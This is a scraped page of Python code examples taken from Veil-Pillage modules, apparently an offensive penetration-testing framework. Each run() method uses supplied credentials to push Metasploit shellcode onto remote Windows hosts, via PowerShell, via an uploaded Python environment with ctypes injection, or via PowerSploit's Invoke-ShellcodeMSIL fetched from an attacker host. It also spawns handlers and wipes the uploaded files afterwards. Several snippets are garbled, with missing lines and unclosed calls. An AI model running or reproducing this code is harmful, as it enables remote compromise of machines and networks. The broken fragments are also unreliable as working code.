Exemplo n.º 1
    def run(self):

        # assume single set of credentials
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]
        spawnHandler = self.required_options["spawn_handler"][0]

        # create our powershell payload
        p = virtual.Payload()

        # pull out any msfpayload payloads/options
        if self.args.msfpayload:
                [self.args.msfpayload, self.args.msfoptions])

        # set custom shellcode if specified
        elif self.args.custshell:

        # get the powershell command
        powershellCommand = p.generate()

        # re-print the title and module name after shellcode generation (Veil-Evasion trashes this)
        sys.stdout.write(" [*] Executing module: " + helpers.color(self.name) +

        # if we're using Veil-Evasion's generated handler script, try to spawn it
        if spawnHandler.lower() == "true":
            # turn the payload shellcode object into a handler script
            handlerPath = helpers.shellcodeToHandler(p.shellcode)
            # make sure a handler was returned
            if handlerPath != "":
                # command to spawn a new tab
                cmd = "gnome-terminal --tab -t \"Veil-Pillage Handler\" -x bash -c \"echo ' [*] Spawning Metasploit handler...' && msfconsole -r '" + handlerPath + "'\""
                # invoke msfconsole with the handler script in a new tab
                raw_input("\n\n [>] Press enter when handler is ready: ")

        for target in self.targets:

            print helpers.color(" [*] Triggering powershell command on " +

            # execute the powershell command on each host
            command_methods.executeCommand(target, username, password,
                                           powershellCommand, triggerMethod)

            self.output += "[*] Powershell inject command triggered using creds '" + username + ":" + password + "' on " + target + " with " + triggerMethod + "\n"

            # build our cleanup file -> kill all powershell processes
            killCMD = "taskkill /f /im powershell.exe"
            self.cleanup += "executeCommand|" + target + "|" + username + "|" + password + "|" + killCMD + "|" + triggerMethod + "\n"
Exemplo n.º 2
    def run(self):

        # assume single set of credentials
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]
        spawnHandler = self.required_options["spawn_handler"][0]

        # create our powershell payload
        p = virtual.Payload()

        # pull out any msfpayload payloads/options
        if self.args.msfpayload:
            p.shellcode.SetPayload([self.args.msfpayload, self.args.msfoptions])

        # set custom shellcode if specified
        elif self.args.custshell:

        # get the powershell command
        powershellCommand = p.generate()

        # re-print the title and module name after shellcode generation (Veil-Evasion trashes this)
        sys.stdout.write(" [*] Executing module: " + helpers.color(self.name) + "...")

        # if we're using Veil-Evasion's generated handler script, try to spawn it
        if spawnHandler.lower() == "true":
            # turn the payload shellcode object into a handler script
            handlerPath = helpers.shellcodeToHandler(p.shellcode)
            # make sure a handler was returned
            if handlerPath != "":
                # command to spawn a new tab
                cmd = "gnome-terminal --tab -t \"Veil-Pillage Handler\" -x bash -c \"echo ' [*] Spawning Metasploit handler...' && msfconsole -r '" + handlerPath + "'\""
                # invoke msfconsole with the handler script in a new tab
                raw_input("\n\n [>] Press enter when handler is ready: ")

        for target in self.targets:

            print helpers.color(" [*] Triggering powershell command on "+target)

            # execute the powershell command on each host
            command_methods.executeCommand(target, username, password, powershellCommand, triggerMethod)

            self.output += "[*] Powershell inject command triggered using creds '"+username+":"+password+"' on "+target+" with "+triggerMethod+"\n"

            # build our cleanup file -> kill all powershell processes
            killCMD = "taskkill /f /im powershell.exe"
            self.cleanup += "executeCommand|"+target+"|"+username+"|"+password+"|"+killCMD+"|"+triggerMethod+"\n"
Exemplo n.º 3
    def run(self):

        handlerPath = "none"

        # assume single set of credentials
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]
        spawnHandler = self.required_options["spawn_handler"][0]

        # nab up some shellcode from Veil-Evasion
        sc = shellcode.Shellcode()

        # set the payload to use, if specified
        if self.args.msfpayload:
            sc.SetPayload([self.args.msfpayload, self.args.msfoptions])

        # set custom shellcode if specified
        elif self.args.custshell:

        # base64 our shellcode
        b64sc = base64.b64encode(sc.generate().decode("string_escape"))

        # re-print the title and module name after shellcode generation (Veil-Evasion trashes this)
        sys.stdout.write(" [*] Executing module: " + helpers.color(self.name) +

        # if we're using Veil-Evasion's generated handler script, try to spawn it
        if spawnHandler.lower() == "true":
            # turn our shellcode object into a handler script
            handlerPath = helpers.shellcodeToHandler(sc)
            # make sure a handler was returned
            if handlerPath != "":
                # command to spawn a new tab
                cmd = "gnome-terminal --tab -t \"Veil-Pillage Handler\" -x bash -c \"echo ' [*] Spawning Metasploit handler...' && msfconsole -r '" + handlerPath + "'\""
                # invoke msfconsole with the handler script in a new tab
                raw_input("\n\n [>] Press enter when handler is ready: ")

        # otherwise, if we have a custom handler path, try to invoke that
        elif handlerPath.lower() != "none":
            if os.path.isdir(handlerPath):
                # command to spawn a new tab
                cmd = "gnome-terminal --tab -t \"Veil-Pillage Handler\" -x bash -c \"echo ' [*] Spawning Metasploit handler...' && msfconsole -r '" + handlerPath + "'\""
                # invoke msfconsole with the handler script in a new tab
                raw_input("\n [>] Press enter when handler is ready: ")
                print helpers.color(" [!] Warning: handlerPath '" +
                                    handlerPath + "' not valid!")

        # command to unzip the uploaded python installation
        unzipCommand = "C:\\\\Windows\\\\Temp\\\\7za.exe x -y -oC:\\\\Windows\\\\Temp\\\\ C:\\\\Windows\\\\Temp\\\\python.zip"
        # path to the 7zip binary
        zipPath = settings.VEIL_PILLAGE_PATH + "/data/environments/7za.exe"

        # command to invoke shellcode using python
        pythonCMD = "C:\\\\Windows\\\\Temp\\\\python\\\\python.exe -c \"from ctypes import *;a=\\\"%s\\\".decode(\\\"base_64\\\");cast(create_string_buffer(a,len(a)),CFUNCTYPE(c_void_p))()\"" % (
        # path to the minial python isntall
        pythonPath = settings.VEIL_PILLAGE_PATH + "/data/environments/python.zip"

        for target in self.targets:

            # upload the 7zip.exe binary and the python install
            uploadResult = smb.uploadFiles(target, username, password, "C$",
                                           [zipPath, pythonPath])

            if uploadResult == "success":
                self.output += "[*] 7za.exe and python.zip successfully uploaded using creds '" + username + ":" + password + "' on " + target + "\n"

                print helpers.color(" [*] Triggering 7zip unzip command on " +
                command_methods.executeCommand(target, username, password,
                                               unzipCommand, triggerMethod)
                self.output += "[*] 7za unzip command triggered using creds '" + username + ":" + password + "' on " + target + " with " + triggerMethod + "\n"

                print helpers.color(" [*] Triggering 'python -c' command on " +
                command_methods.executeCommand(target, username, password,
                                               pythonCMD, triggerMethod)
                self.output += "[*] 'python -c' inject command triggered using creds '" + username + ":" + password + "' on " + target + " with " + triggerMethod + "\n"

                # build our cleanup file -> kill all python processes and delete the environments
                killCMD = "taskkill /f /im python.exe"
                self.cleanup += "executeCommand|" + target + "|" + username + "|" + password + "|" + killCMD + "|" + triggerMethod + "\n"
                # command to delete the python extracted directory, zipped python environment and 7za.exe binary
                delCMD = "rmdir c:\\Windows\\Temp\\Python /s /q & del C:\\Windows\\Temp\\python.zip & del C:\\Windows\\Temp\\7za.exe"
                self.cleanup += "executeCommand|" + target + "|" + username + "|" + password + "|" + delCMD + "|" + triggerMethod + "\n"

                self.output += "[!] 7za.exe and python.zip unsuccessfully uploaded using creds '" + username + ":" + password + "' on " + target + "\n"
                print helpers.color(
                    "[!] 7za.exe and python.zip unsuccessfully uploaded to " +
                    target + "\n",
    def run(self):

        # assume single set of credentials
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]
        spawnHandler = self.required_options["spawn_handler"][0]
        use_ssl = self.required_options["use_ssl"][0]
        lhost = self.required_options["lhost"][0]

        # nab up some shellcode from Veil-Evasion
        # users can set custom shellcode there
        sc = shellcode.Shellcode()

        # set the payload to use, if specified
        if self.args.msfpayload:
            sc.SetPayload([self.args.msfpayload, self.args.msfoptions])

        # set custom shellcode if specified
        elif self.args.custshell:

        # generate our shellcode and get it into the correct format
        sc_raw = sc.generate()
        sc_transformed = ",0".join(sc_raw.split("\\"))[1:]

        # re-print the title and module name after shellcode generation (Veil-Evasion trashes this)
        sys.stdout.write(" [*] Executing module: " + helpers.color(self.name) +

        # if we're using Veil-Evasion's generated handler script, try to spawn it
        if spawnHandler.lower() == "true":
            # turn our shellcode object into a handler script
            handlerPath = helpers.shellcodeToHandler(sc)
            # make sure a handler was returned
            if handlerPath != "":
                # command to spawn a new tab
                cmd = "gnome-terminal --tab -t \"Veil-Pillage Handler\" -x bash -c \"echo ' [*] Spawning Metasploit handler...' && msfconsole -r '" + handlerPath + "'\""
                # invoke msfconsole with the handler script in a new tab
                raw_input("\n\n [>] Press enter when handler is ready: ")

        # path to the PowerSploit Invoke-ShellcodeMSIL.ps1 powershell script
        secondStagePath = settings.VEIL_PILLAGE_PATH + "/data/PowerSploit/Invoke-ShellcodeMSIL.ps1"

        # command to invoke the appropriate shellcode in the script
        scriptArguments = "Invoke-ShellcodeMSIL -Shellcode @(%s)" % (

        # trigger the powershell download on all targets

        for target in self.targets:
            self.output += "[*] Powersploit:Invoke-ShellcodeMSIL triggered using creds '" + username + ":" + password + "' on " + target + " using " + triggerMethod + "\n"

            # build our cleanup file -> kill all powershell processes
            killCMD = "taskkill /f /im powershell.exe"
            self.cleanup += "executeCommand|" + target + "|" + username + "|" + password + "|" + killCMD + "|" + triggerMethod + "\n"
Exemplo n.º 5
    def run(self):

        handlerPath = "none"

        # assume single set of credentials
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]
        spawnHandler = self.required_options["spawn_handler"][0]

        # nab up some shellcode from Veil-Evasion
        sc = shellcode.Shellcode()

        # set the payload to use, if specified
        if self.args.msfpayload:
            sc.SetPayload([self.args.msfpayload, self.args.msfoptions])

        # set custom shellcode if specified
        elif self.args.custshell:

        # base64 our shellcode
        b64sc = base64.b64encode(sc.generate().decode("string_escape"))

        # re-print the title and module name after shellcode generation (Veil-Evasion trashes this)
        sys.stdout.write(" [*] Executing module: " + helpers.color(self.name) + "...")

        # if we're using Veil-Evasion's generated handler script, try to spawn it
        if spawnHandler.lower() == "true":
            # turn our shellcode object into a handler script
            handlerPath = helpers.shellcodeToHandler(sc)
            # make sure a handler was returned
            if handlerPath != "":
                # command to spawn a new tab
                cmd = "gnome-terminal --tab -t \"Veil-Pillage Handler\" -x bash -c \"echo ' [*] Spawning Metasploit handler...' && msfconsole -r '" + handlerPath + "'\""
                # invoke msfconsole with the handler script in a new tab
                raw_input("\n\n [>] Press enter when handler is ready: ")

        # otherwise, if we have a custom handler path, try to invoke that
        elif handlerPath.lower() != "none":
            if os.path.isdir(handlerPath):
                # command to spawn a new tab
                cmd = "gnome-terminal --tab -t \"Veil-Pillage Handler\" -x bash -c \"echo ' [*] Spawning Metasploit handler...' && msfconsole -r '" + handlerPath + "'\""
                # invoke msfconsole with the handler script in a new tab
                raw_input("\n [>] Press enter when handler is ready: ")
                print helpers.color(" [!] Warning: handlerPath '"+handlerPath+"' not valid!")
        else: pass

        # command to unzip the uploaded python installation
        unzipCommand = "C:\\\\Windows\\\\Temp\\\\7za.exe x -y -oC:\\\\Windows\\\\Temp\\\\ C:\\\\Windows\\\\Temp\\\\python.zip"
        # path to the 7zip binary
        zipPath = settings.VEIL_PILLAGE_PATH+"/data/environments/7za.exe"

        # command to invoke shellcode using python
        pythonCMD = "C:\\\\Windows\\\\Temp\\\\python\\\\python.exe -c \"from ctypes import *;a=\\\"%s\\\".decode(\\\"base_64\\\");cast(create_string_buffer(a,len(a)),CFUNCTYPE(c_void_p))()\"" %(b64sc)
        # path to the minial python isntall
        pythonPath =  settings.VEIL_PILLAGE_PATH+"/data/environments/python.zip"

        for target in self.targets:

            # upload the 7zip.exe binary and the python install
            uploadResult = smb.uploadFiles(target, username, password, "C$", "\\Windows\\Temp\\", [zipPath, pythonPath])

            if uploadResult == "success":
                self.output += "[*] 7za.exe and python.zip successfully uploaded using creds '"+username+":"+password+"' on "+target+"\n"

                print helpers.color(" [*] Triggering 7zip unzip command on " + target)
                command_methods.executeCommand(target, username, password, unzipCommand, triggerMethod)
                self.output += "[*] 7za unzip command triggered using creds '"+username+":"+password+"' on "+target+" with "+triggerMethod+"\n"

                print helpers.color(" [*] Triggering 'python -c' command on " + target)
                command_methods.executeCommand(target, username, password, pythonCMD, triggerMethod)
                self.output += "[*] 'python -c' inject command triggered using creds '"+username+":"+password+"' on "+target+" with "+triggerMethod+"\n"

                # build our cleanup file -> kill all python processes and delete the environments
                killCMD = "taskkill /f /im python.exe"
                self.cleanup += "executeCommand|"+target+"|"+username+"|"+password+"|"+killCMD+"|"+triggerMethod+"\n"
                # command to delete the python extracted directory, zipped python environment and 7za.exe binary
                delCMD = "rmdir c:\\Windows\\Temp\\Python /s /q & del C:\\Windows\\Temp\\python.zip & del C:\\Windows\\Temp\\7za.exe"
                self.cleanup += "executeCommand|"+target+"|"+username+"|"+password+"|"+delCMD+"|"+triggerMethod+"\n"

                self.output += "[!] 7za.exe and python.zip unsuccessfully uploaded using creds '"+username+":"+password+"' on "+target+"\n"
                print helpers.color("[!] 7za.exe and python.zip unsuccessfully uploaded to "+target+"\n", warning=True)
    def run(self):

        # assume single set of credentials
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]
        spawnHandler = self.required_options["spawn_handler"][0]
        use_ssl = self.required_options["use_ssl"][0]
        lhost = self.required_options["lhost"][0]

        # nab up some shellcode from Veil-Evasion
        # users can set custom shellcode there
        sc = shellcode.Shellcode()

        # set the payload to use, if specified
        if self.args.msfpayload:
            sc.SetPayload([self.args.msfpayload, self.args.msfoptions])

        # set custom shellcode if specified
        elif self.args.custshell:

        # generate our shellcode and get it into the correct format
        sc_raw = sc.generate()
        sc_transformed = ",0".join(sc_raw.split("\\"))[1:]

        # re-print the title and module name after shellcode generation (Veil-Evasion trashes this)
        sys.stdout.write(" [*] Executing module: " + helpers.color(self.name) + "...")

        # if we're using Veil-Evasion's generated handler script, try to spawn it
        if spawnHandler.lower() == "true":
            # turn our shellcode object into a handler script
            handlerPath = helpers.shellcodeToHandler(sc)
            # make sure a handler was returned
            if handlerPath != "":
                # command to spawn a new tab
                cmd = (
                    "gnome-terminal --tab -t \"Veil-Pillage Handler\" -x bash -c \"echo ' [*] Spawning Metasploit handler...' && msfconsole -r '"
                    + handlerPath
                    + "'\""
                # invoke msfconsole with the handler script in a new tab
                raw_input("\n\n [>] Press enter when handler is ready: ")

        # path to the PowerSploit Invoke-ShellcodeMSIL.ps1 powershell script
        secondStagePath = settings.VEIL_PILLAGE_PATH + "/data/PowerSploit/Invoke-ShellcodeMSIL.ps1"

        # command to invoke the appropriate shellcode in the script
        scriptArguments = "Invoke-ShellcodeMSIL -Shellcode @(%s)" % (sc_transformed)

        # trigger the powershell download on all targets
            self.targets, username, password, secondStagePath, lhost, scriptArguments, triggerMethod, ssl=use_ssl

        for target in self.targets:
            self.output += (
                "[*] Powersploit:Invoke-ShellcodeMSIL triggered using creds '"
                + username
                + ":"
                + password
                + "' on "
                + target
                + " using "
                + triggerMethod
                + "\n"

            # build our cleanup file -> kill all powershell processes
            killCMD = "taskkill /f /im powershell.exe"
            self.cleanup += (
                + target
                + "|"
                + username
                + "|"
                + password
                + "|"
                + killCMD
                + "|"
                + triggerMethod
                + "\n"